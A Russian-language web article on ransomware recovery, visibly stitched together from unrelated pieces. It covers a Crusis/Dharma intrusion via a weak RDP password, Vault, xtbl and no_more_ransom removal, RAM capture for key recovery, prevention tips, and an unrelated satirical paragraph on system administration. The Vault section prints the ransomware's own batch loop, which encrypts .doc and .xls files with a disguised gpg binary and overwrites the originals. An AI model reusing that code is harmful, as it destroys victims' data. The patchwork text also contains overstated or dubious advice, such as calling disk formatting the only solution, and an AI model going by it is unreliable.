Восстановление файлов после вируса-шифровальщика

Вирус-шифровальщик: как вылечить и расшифровать файлы и можно ли это сделать?

Как утверждается, после оплаты хакеры активируют дешифровку через удаленный доступ к своему вирусу, который сидит в системе, или через дополнительный апплет, если тело вируса удалено. Выглядит это более чем сомнительно.

Хочется отметить и тот факт, что в Интернете полно фейковых постов о том, что, мол, требуемая сумма была уплачена, а данные успешно восстановлены. Это все ложь! И правда – где гарантия, что после оплаты вирус-шифровальщик в системе не активируется снова? Понять психологию взломщиков нетрудно: заплатил один раз – заплатишь снова

А если речь идет об особо важной информации вроде специфичных коммерческих, научных или военных разработок, обладатели такой информации готовы заплатить сколько угодно, лишь бы файлы остались в целости и сохранности

Как вирус вымогатель Crusis (Dharma) шифрует файлы

Спокойно во всем разобравшись и почитав похожие обращения на тему шифровальщиков в интернете, я узнал, что словил разновидность известного вируса-шифровальщика Crusis (Dharma). Касперский его детектит как Trojan-Ransom.Win32.Crusis.to. Он ставит разные расширения к файлам, в том числе и .combo. У меня список файлов выглядел примерно вот так:

  • Ванино.docx.id-24EE2FBC..combo
  • Петропавловск-Камчатский.docx.id-24EE2FBC..combo
  • Хороль.docx.id-24EE2FBC..combo
  • Якутск.docx.id-24EE2FBC..combo

Расскажу еще некоторые подробности о том, как шифровальщик поработал. Я не упомянул важную вещь. Данный компьютер был в домене. Шифрование файлов было выполнено от доменного пользователя!!! Вот тут возникает вопрос, откуда вирус его взял. На логах контроллеров доменов я не увидел информации и подборе пароля пользователя. Не было массы неудачных авторизаций. Либо использовалась какая-то уязвимость, либо я не знаю, что и думать. Использована учетная запись, которая никогда не логинилась в данную систему. Была авторизация по rdp от учетной записи доменного пользователя, а затем шифрование. На самой системе тоже не было видно следов перебора пользователей и паролей. Практически сразу был логин по rdp доменной учеткой. Нужно было подобрать, как минимум, не только пароль, но и имя.

К сожалению, на учетной записи был пароль 123456. Это была единственная учетная запись с таким паролем, которую пропустили админы на местах. Человеческий фактор. Это был руководитель и по какой-то причине целая череда системных администраторов знали про этот пароль, но не меняли его. Очевидно, в этом причина использования именно этой учетной записи. Но тем не менее, остается неизвестен механизм получения даже такого простого пароля и имени пользователя.

Зараженную шифровальщиком виртуальную машину я выключил и удалил, предварительно забрав образ диска. Из образа забрал сам вирус, чтобы посмотреть на его работу. Дальнейший рассказ будет уже на основе запуска вируса в виртуальной машине.

Еще небольшая подробность. Вирус просканировал всю локальную сеть и попутно зашифровал информацию на тех компьютерах, где были какие-то расшаренные папки с доступом для всех. Я первый раз видел такую модификацию шифровальщика. Это действительно страшная вещь. Такой вирус может просто парализовать работу всей организации. Допустим, по какой-то причине, у вас был доступ по сети к самим бэкапам. Или использовали какой-то ненадежный пароль для учетной записи. Может так получиться, что будет зашифровано все – и данные, и архивные копии. Я вообще теперь подумываю о хранении бэкапов не только в изолированной сетевой среде, но вообще на выключенном оборудовании, которое запускается только для того, чтобы сделать бэкап.

Ректальное администрирование: Основы для практикующих системных АДминистраторов

Одной из самых популярных и зарекомендовавших себя методологий системного администрирования является так называемое ректальное. Редкий случай сопровождения и обслуживания информационных систем, инфраструктуры организации обходится без его использования. Зачастую без знания данной методологии сисадминам даже бывает сложно найти работу в сфере ИТ, потому что работодатели, особенно всякие аутсорсинговые ИТ фирмы, в основном отдают предпочтение классическим, зарекомендовавшим себя методикам, а не новомодным заграничным веяниям: практикам ITIL, нормальным ITSM и прочей ерунде.

Удаление шифровальщика

Удалить Ваулт достаточно просто: он не глубоко проникает в систему и портит жизнь только тем, что закрывает доступ к информации. Для чистки системы используйте лечащую утилиту Dr.Web CureIt! или Kaspersky Virus Removal Tool. Запускать эти утилиты следует в безопасном режиме Windows.

Порядок простой:

  1. Запустите утилиту, выполните глубокое сканирование.
  2. Удалите обнаруженное вредоносное ПО.

Дополнительно следует удалить компоненты Ваулт, которые хранятся в скрытой папке по адресу C:\Users\Пользователь\AppData\Loca\Temp. Структура вредоносного кода выглядит следующим образом:

  • 3c21b8d9.cmd.
  • fabac41c.js.
  • 04fba9ba_VAULT.KEY.
  • VAULT.txt.
  • Sdc0.bat.
  • CONFIRMATION.KEY.
  • VAULT.KEY.

Последние два компонента вам пригодятся, если вы решите заплатить злоумышленникам за расшифровку. В них хранится открытая часть ключа (у хакеров закрытая часть, без которой код не снять) и информация о количестве зашифрованных данных.

Есть и другой вариант – записать на флешку Kaspersky Rescue Disk и загрузить с неё компьютер. Вам понадобится работающий компьютер, флешка, утилита для записи и образ Kaspersky Rescue Disk 10.

Решения, предлагаемые разработчиками антивирусного ПО

Расшифровка вируса-шифровальщика, как считается, может производиться при помощи специальных утилит, хотя при наличии технологий с ключом 2048 или 3072 бита на них особо рассчитывать не стоит (к тому же многие из них удаляют файлы после дешифровки, а потом восстарновленные файлы исчезают по вине присутствия тела вируса, которое не было удалено до этого).

Тем не менее попробовать можно. Из всех программ стоит выделить RectorDecryptor и ShadowExplorer. Как считается, пока ничего лучше создано не было. Но проблема может состоять еще и в том, что при попытке применения дешифратора гарантии того, что вылечиваемые файлы не будут удалены, нет. То есть, если не избавиться от вируса изначально, любая попытка дешифрования будет обречена на провал.

Кроме удаления зашифрованной информации может быть и летальный исход – неработоспособной окажется вся система. Кроме того, современный вирус-шифровальщик способен воздействовать не только на данные, хранящиеся на жестком диске компьютера, но и на файлы в облачном хранилище. А тут решений по восстановлению информации нет. К тому же, как оказалось, во многих службах принимаются недостаточно эффективные меры защиты (тот же встроенный в Windows 10 OneDrive, который подвержен воздействию прямо из операционной системы).

Как не допустить заражения

Конечно же никогда не открывать вложения в письмах от незнакомых вам людей. Всегда можно уточнить, ответив на письмо, кто он (отправитель) такой, и откуда он узнал адрес вашей электронной почты.

Если же желание открыть вложения у вас не убавилось – обязательно проверьте расширения вложенных файлов. Если они заканчиваются на указанные выше «опасные» расширения файлов – ни в коем случае не открывайте их. Проше попросить отправителя выслать файлы в другом формате. Помните, в большинстве случаев отправитель даже не подозревает, что от его имени отправлялись файлы вируса-шифровальщика, и скорее всего он ответит вам, что ничего вам не отправлял и знать вас – не знает.

Более-менее адекватное антивирусное ПО, которое ловит эти вирусы-шифровальщики, это, пожалуй, Kaspersky Internet Security. Список антивирусов, известных мне, которые точно не прошли проверки и не заблокировали этот вирус – это Avast! и Microsoft Endpoint Protection.

В любом случае 100% защиты от антивируса ждать не стоит. Так как живут вирусы 2-3 дня, и после добавления их в базу антивирусов, код их переписывается.

update 28.04.2015: Так же есть технология теневого копирования в ОС Windows 7, которая позволяет откатить файл до рабочего состояния. Вопрос только в размерах вашего жесткого диска и свободного места на нем.

update 21.08.2015: Недавно столкнулся с очередным “заражением” – файлы пользователя были зашифрованы. Сценарий – полностью идентичен. В архиве находился сценарий под видом документа Excel. Мы пойдем другим путем, решил я, и открыл оснастку Управления групповой политикой в домене (сразу уточню – я программист, системное администрирование – побочный род деятельности, поэтому реализовал задачу как смог).

Актуально для сети с использованием домена Active Directory. Перехожу в объекты групповой политики и создаю новый объект “Запрет выполнения скриптов”. Перехожу в конфигурацию пользователя – Настройки – Параметры панели управления – Параметры папок.

Добавляю 3 объекта для расширений hta, js, vbs с сопоставлением notepad.exe. Назначаю нужным группам пользователей созданный объект групповой политики. После перезагрузки все скрипты по умолчанию открываются через Блокнот и, как следствите, кроме недопонимания пользователя, не вызывают никаких других непоправимых последствий.

update 04.02.2016: Сегодня случилось очередное ЧП локального формата. Менеджеру по продажам пришло письмо с манящим заголовком Карточка предприятия с одноименным архивом .rar во вложении. И даже несмотря на то, что никаких карточек ни от какого клиента он не ждал – архив открыл. И увидев внутри Карточка предприятия.exe – не задумываясь его запустил… Встроенный в ОС Защитник Windows видимо не ожидал такой наглости злоумышленников и… спокойно пропустил запуск .exe файла из этого архива. Результат само собой на лицо – все файлы пользователя оказались зараженными.

Ограничивать политиками список разрешенных программ конечно дело неблагодарное, поэтому решил пойти другим путем… Возможно для многих будет приятной неожиданностью, но Касперский выпустил наконец бесплатную версию антивируса, с сильно урезанным функционалом… но и оставшегося хватает для большинства рабочих мест. Вот как-раз его и удалось протестировать на клиенте. Само собой расшифровать зашифрованное никакому продукту не по силам, интересен был лишь факт блокировки шифровальщика (по моему скромному опыту – Avast! с этой задачей не справляется, может что-то изменилось уже – но доверия к этому антивирусу уже нет).

Итак, после установки и запуска без изменения настроек Kaspersky Free – вообще никак не отреагировал на запуск .exe файла вируса-шифровальщика, что конечно-же обескуражило – надежды не оправдались 🙁 Однако, решил поиграться с настройками и, только после того, как выставил высокий уровень защиты для файлового антивируса, добился желаемого результата – файл с вирусом-шифровальщиком был заблокирован в момент запуска!

Где могут храниться файлы программ-шифровальщиков

Windows NT/2000/XP — Диск:\Documents and Settings\%UserName%\Application Data\%USERPROFILE%\Local Settings\Application Data

Windows Vista/7/8/10 — Диск:\Users\%UserName%\AppData\Roaming\%USERPROFILE%\AppData\Local 

TEMP (временный каталог)

%TEMP%\xxxxxxx.tmp\, где x — символы a-z, 0-9

%TEMP%\xxxxxxx.tmp\xx\, где x — символы a-z, 0-9

%TEMP%\xxxxxxx\, где x — символы a-z, 0-9

%WINDIR%\Temp

Временный каталог Internet Explorer

Windows NT/2000/XP — %USERPROFILE%\Local Settings\Temporary Internet Files\ 

Windows Vista/7/8/10 — %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\content.ie5\xxxxxxxx, где x — символы a-z, 0-9

Рабочий стол

%UserProfile%\Desktop\

Корзина

Диск:\Recycler\             

Диск:\$Recycle.Bin\  

Диск:\$Recycle.Bin\s-1-5-21-??????????-??????????-??????????-1000, , где x — символы 0-9

Системный каталог

%WinDir%                                                      

%SystemRoot%\system32\

Каталог документов пользователя

%USERPROFILE%\Мои документы\

%USERPROFILE%\Мои документы\Downloads

Каталог для скачивания файлов в веб-браузере

%USERPROFILE%\Downloads  

Каталог автозагрузки

%USERPROFILE%\Главное меню\Программы\Автозагрузка

Где скачать дешифратор no_more_ransom

Вопрос простого и надежного дешифратора встает в первую очередь, когда дело касается вируса-шифровальщика. Первое, что я посоветую, это воспользоваться сервисом https://www.nomoreransom.org. А вдруг вам повезет у них будет дешифратор под вашу версию шифровальщика no_more_ransom. Скажу сразу, что шансов у вас не много, но попытка не пытка. На главной странице нажимаете Yes:

Затем загружаете пару зашифрованных файлов и нажимаете Go! Find out:

На момент написания статью дешифратора на сайте не было.

Возможно вам повезет больше. Можно еще ознакомиться со списком дешифраторов для скачивания на отдельной странице – https://www.nomoreransom.org/decryption-tools.html. Может быть там найдется что-то полезное. Когда вирус совсем свежий шансов на это мало, но со временем возможно что-то появится. Есть примеры, когда в сети появлялись дешифраторы к некоторым модификациям шифровальщиков. И эти примеры есть на указанной странице.

Где еще можно найти дешифратор я не знаю. Вряд ли он реально будет существовать, с учетом особенностей работы современных шифровальщиков. Полноценный дешифратор может быть только у авторов вируса.

Создание копии ОЗУ: зачем это надо?

Классика учит нас, что спасение утопающих — дело рук самих утопающих. В этой главе будет рассказано о том, какие действия может предпринять пользователь инфицированного компьютера, чтобы спасти свои данные. Этот способ не является универсальным и не гарантирует стопроцентного спасения данных. Однако это лучше, чем ничего.

Единственное, в чем можно быть уверенным в момент осуществления атаки криптолокера — это то, что, когда владелец компьютера впервые видит на экране монитора требование заплатить деньги, криптографический ключ, использованный для шифрования файлов, скорее всего еще находится в памяти компьютера. В этот момент следует сделать криминалистическую копию оперативной памяти компьютера (ОЗУ). В дальнейшем специалисты могут извлечь из этой копии криптографический ключ и расшифровать файлы владельца компьютера.

Одним из инструментов, которым можно сделать копию оперативной памяти, является Belkasoft Live RAM Capturer.

Пройдите на сайт Belkasoft (https://belkasoft.com/get) и заполните форму запроса этой программы.

Рисунок 1. Форма запроса Belkasoft

После этого вы получите электронное письмо, в котором будет ссылка на скачивание Belkasoft Live RAM Capturer. Загрузите эту программу и поместите ее на флешку. Подключите флешку к компьютеру, подвергнувшемуся атаке вируса-вымогателя.

Существует 32-битная (файл RamCapture.exe) и 64-битная (файл RamCapture64.exe) версии Belkasoft Live RAM Capturer.

Рисунок 2. Файлы Belkasoft Live RAM Capturer

Кликните на файл, разрядность которого соответствует разрядности вашей операционной системы.

Ничего страшного не произойдет, если вы случайно ошибетесь. В этом случае вы просто увидите сообщение об ошибке.

Рисунок 3. Сообщение об ошибке

После запуска Belkasoft Live RAM Capturer вы увидите основное окно программы.

Рисунок 4. Главное окно Belkasoft Live RAM Capturer

Belkasoft Live RAM Capturer предложит сохранить создаваемую копию оперативной памяти компьютера на подключенную флешку. Кликните кнопку Capture!

Если ваша флешка имеет файловую систему FAT (FAT32), а объем оперативной памяти компьютера превышает 4Гб, то вы увидите сообщение Insufficient disk space for the dump file.

Рисунок 5. Сообщение Insufficient disk space for the dump file

Это связано с тем, что Windows не может записать файл размером более 4Гб в файловую систему FAT (FAT32). Для того чтобы сохранить создаваемую копию памяти на флешку, предварительно отформатируйте ее в exFAT или NTFS. Если не сделать этого, можно указать иное место на жестком диске компьютера, где будет сохранена эта копия. В качестве примера был использован путь C:\Users\Igor\Document. Как показано на рисунке 6, такая копия была успешно создана.

Рисунок 6. Сообщение о том, что создание копии оперативной памяти закончено

Имя файла, который содержит копию RAM, соответствует дате его создания.

Рисунок 7. Файл, содержащий данные из ОЗУ компьютера

Вирус ставит расширение vault на doc, jpg, xls и других файлах

Что же конкретно делает с файлами вирус? На первый взгляд кажется, что он просто меняет расширение со стандартного на .vault. Когда я первый раз увидел работу этого virus-шифровальщика, я так и подумал, что это детская разводка. Переименовал обратно файл и очень удивился, когда он не открылся как полагается, а вместо положенного содержания открылась каша из непонятных символов. Тут я понял, то все не так просто, начал разбираться и искать информацию.

Вирус прошелся по всем популярным типам файлов – doc, docx, xls, xlsx, jpeg, pdf и другим. К стандартному имени файла прибавилось новое расширение .vault. Некоторым он шифрует и файлы с локальными базами 1С. У меня таких не было, так что сам лично я это не наблюдал. Простое переименовывание файла обратно, как вы понимаете, тут не помогает.

Так как процесс шифрования не мгновенный, может так получиться, что когда вы узнаете о том, что у вас шурует вирус на компьютере, часть файлов еще будет нормальная, а часть зараженная. Хорошо, если не тронутой останется большая часть. Но чаще всего на это рассчитывать не приходится.

Расскажу, что скрывается за сменой расширения. После шифрования, к примеру, файла file.doc рядом с ним вирус vault создает зашифрованный файл file.doc.gpg, затем зашифрованный file.doc.gpg перемещается на место исходного с новым именем file.doc, и только после этого переименовывается в file.doc.vault. Получается, что исходный файл не удаляется, а перезаписывается зашифрованным документом. После этого его невозможно восстановить стандартными средствами по восстановлению удаленных файлов. Вот часть кода, которая реализует подобный функционал:

dir /B "%1:"&& for /r "%1:" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)

Восстановить файлы xtbl, vault, cbf -расширения

К сожалению, информация как расшифровать xtbl есть только у самих распространителей вируса (и то не факт). Раньше они просили за расшифровку 5 000 рублей, потом подняли стоимость «услуг» до 15 000. Но гарантий, естественно, никаких нет. Вероятность «удачной» сделки стремится к нулю. Немногочисленные случаи в сети, когда удалосьвосстановить файлы после вируса vault (он же xbtl или cbf разница только в сочетании букв), не вызывают доверия. Истории решения вопроса за деньги «рекламируют» сами злоумышленники.

Но не стоит отчаиваться, кое-какие мерынеобходимо предпринять. Если зашифровались файлы на компьютере, то действуйте по инструкции:

  1. Отключите компьютер от интернета. В 90% случаях вирус не сможет продолжить шифрование без доступа к сети.Тогда у вас будет шанс спасти оставшиеся данные.
  2. Зафиксируйте контакты и код для отправки из файла «readme».Сфотографируйте или запишите в блокнот, поскольку на компьютере вы можете потерять доступ к этому файлу. Код понадобится если разработают дешифратор vault, cbf, xbtl.
  3. Просканируйте весь жесткий диск программой Malwarebytes Anti-Malware или CureItот Dr. Web. Все подозрительные объекты удаляйте. Если что-то мешает удалению, то переведите компьютер в безопасный режим и повторите попытку. Не уничтожайте только файл VAULT.key или подобный, он может быть нужен для расшифровки (если она появится).
  4. Переходите к инструкции по восстановлению данных.

Кроме расшифровки есть еще способы вернуть свои файлы. Идеальный вариант, конечно, резервные копии. Если до этого вы их не делали, то после заражения точно займетесь этим вопросом. Когда дубликатов нет остается пара вариантов попытать счастья:

В ОС Виндовс есть встроенная система автоматической архивации. При должной толике везения она будет не отключена.

Некоторым умельцам удалось расшифровать файлы cbf, вернее, восстановить с помощью программы по реанимации удаленных данных R-Studio (или аналогичных)

Можно что-то настроить на компьютере, чтобы защититься от вируса шифровальщика?

а) Во-первых, обязательно поставьте антивирус. Но мы об этом уже говорили.

б) В браузерах можно отключить выполнение скриптов, поскольку их часто используют злоумышленники. Подробности о том, как лучше настроить браузеры Chrome и Firefox, можно прочитать на нашем блоге.

в) Включить показ расширений файлов в «Проводнике» Windows.

г) Windows обычно помечает опасные файлы скриптов VBS и JS иконкой текстового документа, что сбивает неопытных пользователей с толку. Проблему можно решить, назначив программу «Блокнот» (Notepad) приложением по умолчанию для расширений VBS и JS.

д) Можно включить в антивирусе функцию «Режим безопасных программ» (Trusted Applications Mode ), запрещающую установку и исполнение любых программ, которые не внесены в «белый список». По умолчанию она не включена, так как требует некоторого времени для настройки. Но это действительно полезная штука, особенно если пользователи у компьютера не самые продвинутые и есть риск, что они случайно запустят что-нибудь не то.

Методы защиты от вируса no_more_ransom

Как защититься от работы шифровальщика и обойтись без материального и морального ущерба? Есть несколько простых и эффективных советов:

  1. Бэкап! Резервная копия всех важных данных. И не просто бэкап, а бэкап, к которому нет постоянного доступа. Иначе вирус может заразить как ваши документы, так и резервные копии.
  2. Лицензионный антивирус. Хотя они не дают 100% гарантии, но шансы избежать шифрования увеличивают. К новым версиям шифровальщика они чаще всего не готовы, но уже через 3-4 дня начинают реагировать. Это повышает ваши шансы избежать заражения, если вы не попали в первую волну рассылки новой модификации шифровальщика.
  3. Не открывайте подозрительные вложения в почте. Тут комментировать нечего. Все известные мне шифровальщики попали к пользователям через почту. Причем каждый раз придумываются новые ухищрения, чтобы обмануть жертву. К примеру no_more_ransom показывает сначала очень замыленное изображение файла и предлагает скачать версию с четким изображением. И люди ведутся.
  4. Не открывайте бездумно ссылки, присланные вам от ваших знакомых через социальные сети или мессенджеры. Так тоже иногда распространяются вирусы.
  5. Включите в windows отображение расширений файлов. Как это сделать легко найти в интернете. Это позволит вам заметить расширение файла на вирусе. Чаще всего оно будет .exe, .vbs, .src. В повседеневной работе с документами вам вряд ли попадаются подобные расширения файлов.

Постарался дополнить то, что уже писал раньше в каждой статье про вирус шифровальщик. Постараюсь в скором времени сделать единую компиляцию по всем известным мне вирусам-шифровальщикам, чтобы охватить все аспекты в одном месте. А пока прощаюсь. Буду рад полезным замечаниям по статье и вирусу-шифровальщику no_more_ransom в целом.

Кардинальное решение проблемы

Как уже понятно, большинство современных методик положительного результата при заражении подобными вирусами не дает. Конечно, если есть оригинал поврежденного файла, его можно отправить на экспертизу в антивирусную лабораторию. Правда, весьма серьезные сомнения вызывает и то, что рядовой пользователь будет создавать резервные копии данных, которые при хранении на жестком диске тоже могут подвергнуться воздействию вредоносного кода. А о том, что во избежание неприятностей юзеры копируют информацию на съемные носители, речь не идет вообще.

Таким образом, для кардинального решения проблемы вывод напрашивается сам собой: полное форматирование винчестера и всех логических разделов с удалением информации. А что делать? Придется пожертвовать, если не хотите, чтобы вирус или его самосохраненная копия активировались в системе вновь.

Для этого не стоит использовать средства самих Windows-систем (имеется в виду форматирование виртуальных разделов, поскольку при попытке доступа к системному диску будет выдан запрет). Лучше применять загрузку с оптических носителей вроде LiveCD или установочных дистрибутивов, например созданных при помощи утилиты Media Creation Tool для Windows 10.

Перед началом форматирования при условии удаления вируса из системы можно попытаться произвести восстановление целостности системных компонентов через командную строку (sfc /scannow), но в плане дешифрования и разблокировки данных это эффекта не даст. Поэтому format c: – единственно правильное возможное решение, нравится вам это или нет. Только так и можно полностью избавиться от угроз этого типа. Увы, по-другому – никак! Даже лечение стандартными средствами, предлагаемыми большинством антивирусных пакетов, оказывается бессильным.

Поделитесь в социальных сетях:FacebookXВКонтакте
Напишите комментарий